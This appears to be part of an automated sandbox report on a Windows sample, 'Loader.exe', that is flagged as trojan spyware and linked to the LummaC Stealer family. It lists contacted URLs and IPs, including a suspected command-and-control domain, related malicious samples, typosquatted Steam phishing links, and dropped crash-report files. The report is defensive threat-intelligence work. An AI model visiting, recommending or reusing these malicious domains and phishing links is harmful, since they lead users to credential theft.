https://areawannte.bet:443/aRIsj	Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=LrC2xWhJTNZp&l=e	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/dP	Loader.exe, 00000001.00000002.2479485621.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.steampowered.com/	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://areawannte.bet:443/aRIsjI	Loader.exe, 00000001.00000002.2478791044.000000000107A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://recaptcha.net	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.5.dr	false		high
https://store.steampowered.com/	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://127.0.0.1:27060	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://help.steampowered.com/	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.steampowered.com/	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/account/cookiepreferences/	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/mobile	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCou	Loader.exe, 00000001.00000002.2478791044.00000000010F2000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479485621.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com:443/profiles/76561199822375128T	Loader.exe, 00000001.00000002.2478791044.000000000107A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
92.122.104.90	steamcommunity.com	European Union	16625	AKAMAI-ASUS	false
23.197.127.21	unknown	United States	20940	AKAMAI-ASN1EU	false
188.114.96.3	areawannte.bet	European Union	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1634540
Start date and time:	2025-03-11 01:12:25 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Loader.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/6@15/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 48 Number of non-executed functions: 111
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.71.93.126, 20.190.160.128, 23.60.203.209, 4.175.87.197
Excluded domains from analysis (whitelisted): onedsblobvmssprdeus02.eastus.cloudapp.azure.com, fs.microsoft.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
20:13:26	API Interceptor	1x Sleep call for process: WerFault.exe modified
20:13:45	API Interceptor	6x Sleep call for process: Loader.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
92.122.104.90	Launcher.exe	Get hash	malicious	Unknown	Browse
	wanscam software ocx setup download.exe	Get hash	malicious	Unknown	Browse
	9XBNCpoOBa.exe	Get hash	malicious	LummaC Stealer	Browse
	https://staemcomumnity.com/gift/id=95124	Get hash	malicious	Unknown	Browse
	https://steam-shortlink.cfd/s/KQRA	Get hash	malicious	Unknown	Browse
	https://steamcommunity-cash.com/gift-card/6386958612	Get hash	malicious	Unknown	Browse
	https://staemcomunnittly.com/gift/activation=Dor5Fhnm6w	Get hash	malicious	HTMLPhisher	Browse
	https://steamcommunttiy.com/activation=Tvc2Fh12mw1	Get hash	malicious	Unknown	Browse
	https://sltreanmcommnunlty.com/nurka/kisloy/efotr	Get hash	malicious	Unknown	Browse
	http://steamcommunity-cash.com/gift/id=572931441	Get hash	malicious	Unknown	Browse
23.197.127.21	http://steamcomunity.aiq.ru/	Get hash	malicious	Unknown	Browse	steamcommunity.com/
188.114.96.3	3tEL1ZRXA6.exe	Get hash	malicious	FormBook	Browse	www.marposet.shop/6ixs/?Ar6T=oN0T/Esi7H2jJ4TMjw8b93BQPnEdNzyQiBUPeT1k8Z/eibB9ghV+qpvP7NsuhjacLnuX6HraU4xmdMUu2umYnCC8s1rtYFvj99qSyPPCwvQggIKSHQ==&Lfpd=o6ndcl
	2rvyZc27tz.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/50g8/
	INVOICE 4562.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/jjft/
	Payment-031025-pdf.exe	Get hash	malicious	FormBook	Browse	www.ezjytrkuqlw.info/zsr7/
	F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe	Get hash	malicious	FormBook	Browse	www.tgwfj.xyz/b5fo/
	yloe82Jp1k.exe	Get hash	malicious	FormBook	Browse	www.comebackhome.online/dv29/
	6KzB3ReZ6z.exe	Get hash	malicious	FormBook	Browse	www.clzt.shop/j1w0/
	3JZ4CUFqSs.exe	Get hash	malicious	FormBook	Browse	www.actpisalnplay.cyou/oxsm/
	g1V10ssekg.exe	Get hash	malicious	FormBook	Browse	www.comebackhome.online/dv29/?UPV=lyDuWv8anyDzCsrsL6PTwCreB/WdAINc3G6wsV0rNYv9zNmSH7KTJBB1K2WfFvHvPOh/z5cHktk3l1356pnt1M3PZl4mowifUTZkIWOf1ffB0d/Fsg==&YrV=FlsDgRMx
	thUKanu6GD.lnk	Get hash	malicious	HTMLPhisher, MalLnk	Browse	559236.na3.to/gift/setup4391.msi

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	Launcher.exe	Get hash	malicious	Unknown	Browse	92.122.104.90
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21
	download.php.exe.bin.exe	Get hash	malicious	Amadey, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.73.234.102
	FORTNITE_MOD_MENU.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	Arly.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	FORTNITE_MOD_MENU.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
areawannte.bet	file.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	EasyWay.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	Aura.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	HjBGqnNSh1.exe	Get hash	malicious	Unknown	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	IyaoiEZEqZ.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	85e047k8bQ.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.48.1
	QcFyYAdvys.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.32.1
	ghDiLilbKo.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	JY9Pom7YpC.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.32.1
	1j3PbYTjxr.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.64.1
	Q8jgBrxI7M.exe	Get hash	malicious	DarkTortilla, MSIL Logger, MassLogger RAT	Browse	104.21.48.1
	ShGhJDcXXI.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Nexora.exe	Get hash	malicious	Unknown	Browse	172.67.152.244
	BFL0FqERmU.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.64.1
AKAMAI-ASUS	jklmips.elf	Get hash	malicious	Unknown	Browse	104.116.49.208
	Launcher.exe	Get hash	malicious	Unknown	Browse	92.122.104.90
	GTA_installer.exe	Get hash	malicious	Unknown	Browse	184.30.131.245
	GTA_installer.exe	Get hash	malicious	Unknown	Browse	2.23.77.188
	Nouvelle_commande9353834.xls	Get hash	malicious	Unknown	Browse	23.60.203.209
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	Nouvelle_commande9353834.xls	Get hash	malicious	Unknown	Browse	23.199.214.10
	840.xls	Get hash	malicious	Unknown	Browse	23.199.214.10
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	Fd-Employee-Handbook(1).pdf	Get hash	malicious	Unknown	Browse	23.197.208.205
AKAMAI-ASN1EU	http://video.sibnet.ru	Get hash	malicious	HTMLPhisher	Browse	2.22.242.138
	GTA_installer.exe	Get hash	malicious	Unknown	Browse	95.101.79.27
	GTA_installer.exe	Get hash	malicious	Unknown	Browse	95.101.182.89
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21
	Nouvelle_commande9353834.xls	Get hash	malicious	Unknown	Browse	88.221.110.67
	Order_Mar25.xls	Get hash	malicious	Unknown	Browse	2.22.242.129
	840.xls	Get hash	malicious	Unknown	Browse	2.22.242.138
	POETDB24-2577.xla.xlsx	Get hash	malicious	Unknown	Browse	2.22.242.128
	https://simplified.com/designs/7d05440c-37c6-4466-b5ff-6e61f39c0350/share?utm_content=7d05440c-37c6-4466-b5ff-6e61f39c0350&utm_campaign=share&utm_medium=link&utm_source=projectlinks	Get hash	malicious	Unknown	Browse	2.19.97.97
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Nexora.exe	Get hash	malicious	Unknown	Browse	92.122.104.90 23.197.127.21 188.114.96.3
	Malware.zip	Get hash	malicious	LummaC Stealer	Browse	92.122.104.90 23.197.127.21 188.114.96.3
	Launcher.exe	Get hash	malicious	Unknown	Browse	92.122.104.90 23.197.127.21 188.114.96.3
	CryptocommSetup.msi	Get hash	malicious	BumbleBee	Browse	92.122.104.90 23.197.127.21 188.114.96.3
	COTA#U00c7#U00c3O.xls	Get hash	malicious	Unknown	Browse	92.122.104.90 23.197.127.21 188.114.96.3
	Order_Mar25.xls	Get hash	malicious	Unknown	Browse	92.122.104.90 23.197.127.21 188.114.96.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	92.122.104.90 23.197.127.21 188.114.96.3
	COTA#U00c7#U00c3O.xls	Get hash	malicious	Unknown	Browse	92.122.104.90 23.197.127.21 188.114.96.3
	Order_Mar25.xls	Get hash	malicious	Unknown	Browse	92.122.104.90 23.197.127.21 188.114.96.3
	POETDB24-2577.xla.xlsx	Get hash	malicious	Unknown	Browse	92.122.104.90 23.197.127.21 188.114.96.3

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Loader.exe_e9c6e3d09abbf9d687fdc99f29a13eb6babca2_a0bbbc24_3dc84f1d-f860-4fb2-8221-7aa48737b594\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.866339934083495
Encrypted:	false
SSDEEP:	96:LXF/iwUGyjWsUg9jTOAqyS3QXIDcQlc6VcEdcw3F+BHUHZ0ownOgHkEwH3dEFYAo:TNiw6W9A0LR3UaG/zuiFqZ24IO8A
MD5:	960DA0745F9060BF496FC0BD9B302243
SHA1:	9B54FE69BF1CE5454C750C6EBB06E505B1D0E734
SHA-256:	BCD0B94497B348AB70782B8C9F1C1D72916695260FF138DD771F8656C8C4756F
SHA-512:	56337158010B5828AC33AF71423C4DA2EB943275331B1593AB970D0E11C12AABDF107FB973EB87E2D5CB1ECB8636EB8E87B785F477F87E1D3EE6474FE0C5E597
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.1.2.5.6.0.0.5.2.7.5.0.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.1.2.5.6.0.1.0.7.4.3.6.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.d.c.8.4.f.1.d.-.f.8.6.0.-.4.f.b.2.-.8.2.2.1.-.7.a.a.4.8.7.3.7.b.5.9.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.1.f.b.0.6.a.-.f.9.a.a.-.4.d.d.0.-.8.f.2.c.-.e.9.2.f.3.1.e.2.5.f.6.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.o.a.d.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.x.t.e.r.n.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.b.c.-.0.0.0.1.-.0.0.1.9.-.d.1.c.3.-.e.3.6.4.1.a.9.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.b.4.c.1.8.b.a.9.b.a.2.a.1.7.1.5.a.f.9.5.9.8.4.a.8.3.c.4.c.4.b.0.0.0.0.0.0.0.0.!.0.0.0.0.a.3.2.1.9.c.9.d.7.3.f.8.d.c.4.0.5.4.b.c.7.0.5.b.c.7.1.9.1.b.8.2.f.2.0.2.b.2.d.9.!.L.o.a.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA1D3.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Mar 11 00:13:20 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	209257
Entropy (8bit):	3.595549124823955
Encrypted:	false
SSDEEP:	1536:AgKHEWAJSuBojRypN4uE2aOHc7XLTg+NPI0LAAvwclTPCCDWtTZH7E:CHWiU4uEqHc7XLTgKZicbwNH4
MD5:	61190DFCB4D3B33E82EAB4EC952ACCA3
SHA1:	8538043073B0F394122F75C07D4662F2FB2E8E68
SHA-256:	13F1F6BEAC7B7B636B2F41B769072D2E298AD724141F6B5D6C76E01A6DEEFC2E
SHA-512:	701C55F3BC46849942F0E2F0832E5B63C21CF24604417DE344F14D39266B82A5D5468EC0F4FE398EB6F76A066562EC33B64864D5EB08637D62DF4EAC0A603455
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ....... ..g........................\...(.......$...........t....?..........`.......8...........T............&..a.......................................................................................................eJ......,.......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA2AF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8368
Entropy (8bit):	3.6900377537458935
Encrypted:	false
SSDEEP:	192:R6l7wVeJ6jR6D6YZiSUegmfoVJdpr789bMIsfBEm:R6lXJ8R6D6YsSUegmfoVJcM7fX
MD5:	51CB6ADADA6D5C1183A7910A76C41F20
SHA1:	4D4F6FC83BDCE4E630E2EB38DEF2F2FCB2680CCA
SHA-256:	0EE6D9757A72BD719382E2EF603A94F7445F79C8D9543615BC2CD7A524770923
SHA-512:	1CC27E436361714833B5D70E5099C2AE266FB3269EBD718051C7EAEE953BCF31686C83BB6AC5F43E2D0E47BD42B38A33737DAABA18220ABD1B235AE97406DCBC
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA31D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4730
Entropy (8bit):	4.433439820975549
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZgJg77aI9PMWpW8VYbYm8M4JxdxPcf6FhU+q8vxdxPcfAm/j1Od:uIjfYI7tl7V7JWfOUKWfAmr1Od
MD5:	16B9466842A23AFA77D151A0A904C6CD
SHA1:	AB19AB572CA931411DA0D5A4245916436B2EAB6D
SHA-256:	24286989F038FFAD480B4DA85F007FA2C352AA795B90A9BA4903D9A455EF2B9E
SHA-512:	0313ECDC3B1987EF6A72D0752B9E8E3F41391594911E2CC0FB36F7A6B77D22336E270473374B34721B5F1E5C76D51C5204240DADCA2A9AA81D9A72C5C778BB4C
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="755476" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4733245277809806
Encrypted:	false
SSDEEP:	6144:i9Zfpi6ceLPx9skLmb0fkZWSP3aJG8nAge03BQqZaKFFIeC/DNcX5tdLrIG:2ZHtkZWOcxQqYzruptCG
MD5:	BBDDC8A4D41C4CAC3292BAB46AA26884
SHA1:	125D3C0BBD348B10FC40305946175580F5E0BB6D
SHA-256:	E3AF30F78378D4F1A25C5EBF91E5F3C7BFF339E3313CDFD15165E5A8E0A93BF3
SHA-512:	509E8A8B6AFD575B07BFB0F51BFD24B1EDCD6C7AA507B5BD1687A5BA8FAD62EF3654952AC58ED8095DCE3BB8C32D17DBE48E5731DE2F9D998D46AE08B2EC2C45
Malicious:	false
Reputation:	low
Preview:	regfL...L....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..[.d...............................................................................................................................................................................................................................................................................................................................................\|.M ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.784547103314825
Encrypted:	false
SSDEEP:	768:yUUDoUrSjyutmUu/mRBK47xI7Bdb8lzdzsIO2qloXHysUeBYP:yUYuMUu+Z94rAlZIomV
MD5:	0FBBE8DB554416DCF56B12FDF17EAB03
SHA1:	ED0C2061E72AEB60CB4742D5EDFB1A3AE463C709
SHA-256:	667A396D69C51DB7C5F57A95DABE86A26BECBE93B32AA4775AC652E5BAE1816E
SHA-512:	0C1AAE2292B0E6EFEF31FC3CEEE2AC3ACDAA7663288C530E61938A6848097FA3AE822F328A6BD2E405DAB736585BF36D7C54CFC05F759EDC409713EA04A28403
Malicious:	false
Reputation:	low
Preview:	regfK...K....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..[.d...............................................................................................................................................................................................................................................................................................................................................z.M HvLE........K............../....%....#..................................... ....... ..hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........^...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.

